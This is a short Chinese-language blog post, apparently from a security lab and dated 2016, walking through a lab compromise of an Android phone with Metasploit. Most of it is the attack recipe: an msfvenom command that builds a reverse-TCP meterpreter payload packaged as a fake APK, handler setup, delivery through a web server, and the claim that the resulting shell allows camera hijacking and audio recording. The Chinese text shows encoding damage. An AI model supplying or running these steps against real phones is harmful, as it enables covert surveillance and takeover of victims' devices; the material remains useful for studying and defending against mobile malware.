【原創(chuàng)】使用Metasploit入侵安卓手機(jī)

實(shí)驗(yàn)環(huán)境:Kali Linux 2016.1;IP:192.168.0.105。

受害主機(jī):華為Ascend P7 Android 4.x;IP:192.168.0.102。

實(shí)驗(yàn)過(guò)程:

1.運(yùn)行msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105

LPORT=1234 R > test.apk;

2.運(yùn)行msfconsole,輸入use exploit/multi/handler;

3.執(zhí)行set PAYLOAD android/meterpreter/reverse_tcp;

4.執(zhí)行show options,將本地IP和端口號(hào)修改成和木馬一樣的參數(shù);

5.將test.apk通過(guò)Kali的apache服務(wù)器下載到受害主機(jī)上;

6.在metasploit中執(zhí)行exploit,之后在安卓手機(jī)中安裝test.apk;

7.可以看到,安裝apk之后,我們得到了受害主機(jī)的meterpreter;

8.我們可以在meterpreter下執(zhí)行任何命令,例如檢查是否root,列出當(dāng)前進(jìn)程,甚至劫持?jǐn)z像頭,錄制聲音等等。

Safesonic網(wǎng)絡(luò)安全實(shí)驗(yàn)室2016年08月13日

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容